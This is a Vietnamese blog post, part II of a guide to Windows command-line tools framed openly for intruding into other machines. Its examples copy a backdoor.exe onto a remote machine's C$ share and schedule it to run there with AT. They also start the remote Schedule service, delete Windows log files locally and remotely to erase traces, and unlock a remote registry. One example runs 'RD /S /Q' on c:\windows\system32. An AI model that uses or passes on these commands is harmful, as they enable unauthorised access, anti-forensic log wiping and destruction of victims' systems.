Những lệnh cần thiết dùng trong thâm nhập (Window) phần II

Phần II: Các lệnh cơ bản khác
NU BN MUN COPY BÀI VIT XIN VUI LÒNG TÔN TRNG QUYN TÁC GI

Đâu phải lúc nào bạn cũng dễ dàng thực hiện các thao tác thông giao diện bằng graphic trên máy cần thao tác (ví dụ như những khi bạn đang làm chuyện mờ ám thì làm gì có cái Window Explorer chằng hạn để cho bạn sử dụng và thao tác trên các tập tin) vì thế những lệnh sau tuy đơn giản nhưng cũng khá là quang trọng trong thao tác của bạn, nếu như bạn muốn thâm nhập một máy nào đó chẳng hạn mà bạn coi như không thuộc nằm lòng các lệnh dưới đây thì tôi khuyên bạn hãy bỏ ý định đó đi.

1/Lệnh COPY: lệnh này là lệnh nội trú dùng để sao chép các tập tin (khi bạn xâm nhập vào được rồi thì dĩ nhiên phải để lại cái gì đó thì bạn dùng lệnh này)

Cú pháp:
COPY path1\filename1 path2
(chép tập tin filename1 ở đường dẫn path1 sang đường dẫn path2)
+Chú ý: ở đây tôi dùng định nghĩa đường dẫn tức là có thể gồm một ổ đĩa, một thư mục hay cả một địa chỉ tài nguyên mạng (với điều kiện bạn đã kết nối tới)

Ví dụ:
==>COPY c:\abc.txt d:\
(chép tập tin có tên là abc.txt từ ổ c: sang ổ đĩa d:)
==>COPY c:\backdoor.exe \\203.162.45.2\c$
(chép file backdoor từ ổ đĩa C máy của bạn sang ổ đĩa C của địa chỉ IP 203.162.45.2)
Lưu ý: tên tập tin bạn có thể sử dụng những ký tự đại diện như * hoặc ?
==>Copy c:\*.doc d:\ (chép tất cả các tệp có đuôi .doc sang ổ d:)

2/Lệnh DEL: lệnh này là lệnh nội trú dùng để xóa tập tin (dùng để xóa bỏ dấu chân người lính😉 )

Cú pháp:
DEL path\filename
(xóa file có tên là filename ở tại đường dẫn path)
Ví dụ:
==>DEL c:\windows\*.log
(xóa tất cả tệp tin .log tại ổ đĩa C: và trong thư mục windows)
Mở rộng: DEL \\203.162.45.2\Admin$\*.log

3/Lệnh MD: lệnh này là lệnh nội trú dùng để tạo một thư mục

Cú pháp:
MD path\tenthumuc

Ví dụ:
==>MD c:\windows\temp1
(tạo thư mục temp1 trong thư mục windows của ổ c:)
Mở rộng:
==>MD \\203.162.45.2\Admin$\temp1

4/Lệnh RD hay RMDIR (xóa thư mục)

Cú pháp:
RD /S /Q path\tenthumuc
(với tham số /S thì sẽ xóa tất cả các file và thư mục con nằm trong thư mục cần xóa và tham số /Q là xóa không cần hỏi)

Ví dụ:
==>RD /S /Q c:\windows\system32
(xóa thư mục system32 và tất cả những gì nằm trong system32)

5/Lệnh AT: hẹn giờ cho một chương trình tự kích hoạt (có thể gõ AT /HELP để biết thêm)

Cú pháp:
AT \\IP time /INTERACTIVE “command”

Ví dụ:
==>AT \\203.162.45.2 2:30AM /INTERACTIVE “c:\backdoor.exe”
Hẹn giờ đúng 2:30 thì máy có địa chỉ IP là \\203.162.45.2 sẽ kích hoạt chương trình backdoor.exe trong ổ C:

Lưu ý: lệnh AT chỉ có tác dụng khi service task schedule đã được bật lên. (xem thêm lệnh NET START (trong phần 1) hoặc lệnh SC bên dưới để biết cách bật một service) và muốn chương trình kích hoạt ngay mà không phải đợi thì bạn phải kiểm tra giờ hệ thống tại địa chỉ IP xác định bằng lệnh NET TIME (trong phần 1) và bảo đảm rằng giờ bạn hẹn cho chương trình kích hoạt phải lớn hơn giờ hệ thống ít nhất là 1 phút.

6/Lệnh SC: chạy hoặt tắt một service trên máy xác định

Cú pháp:
SC \\IP start/stop/pause… service

Ví dụ:
==>SC \\203.162.45.2 start Schedule
(chạy service Schedule trên máy có IP 203.162.45.2)

7/Lệnh START: kích hoạt một chương trình tại máy local

Cú pháp:
START “tên chương trình”

Ví dụ: (chạy chương trình notepad từ command line)
==>START notepad
hoặc
==>START notepad.exe

8/Lệnh TASKLIST (xem danh sách và ID các chương trình chạy trong process).
Để tìm hiểu thêm bằng cách gõ TASKLIST /?

9/Lệnh TASKKILL (hủy một process xem thêm bằng cách TASKKILL /?)

Cú pháp:
TASKKILL /PID ID
(hủy chương trình đang chạy theo ID)
hoặc
TASKKILL /F /IM “tên chương trình”
(hủy chương trình có tên đang chạy trong process)

Ví dụ chương trình notepad.exe khi chạy lệnh TASKLIST có ID là 644 thì khi muốn hủy ta gõ lệnh:
==>TASKKILL /PID 644
hoặc
==>TASKKILL /F /IM notepad.exe

10/Lệnh REG: (tạo, xóa, khôi phục, xem… các  giá trị của registry trên máy local hoặc mát mạng)

Cú pháp:
Reg Operation
Trong đó Operation bao gồm các thao tác như Add, Query, Delete, Copy, Save, Load, Unload, Restore, …. để biết thêm chi tiết các bạn gõ Reg Add /?)

Ví dụ:  mở khóa cho registry edit cho máy tính có tên  là ABC bạn bạn gõ như sau:

REG add \\ABC\HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

Đó là những lệnh hết sức cơ bản mà các bạn cần phải nắm rõ nếu như muốn đi bước đầu về lĩnh vực thâm nhập. Nhưng các lệnh này không phải là tất cả vì còn nhiều nhiều lệnh và chương trình khác nữa nhưng đó là những lệnh thiết yếu nhất. Chẳng qua bài viết này chỉ nhằm mục đích thống kê vì đôi khi lâu ngày ta không sử dụng đến rồi cũng quên. Hy vọng bài viết giúp ích cho các bạn và giúp các bạn cũng cố một lại số kiến thức cơ bản.

HẾT
L0ng3ta.

Gửi phản hồi

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s

%d bloggers like this: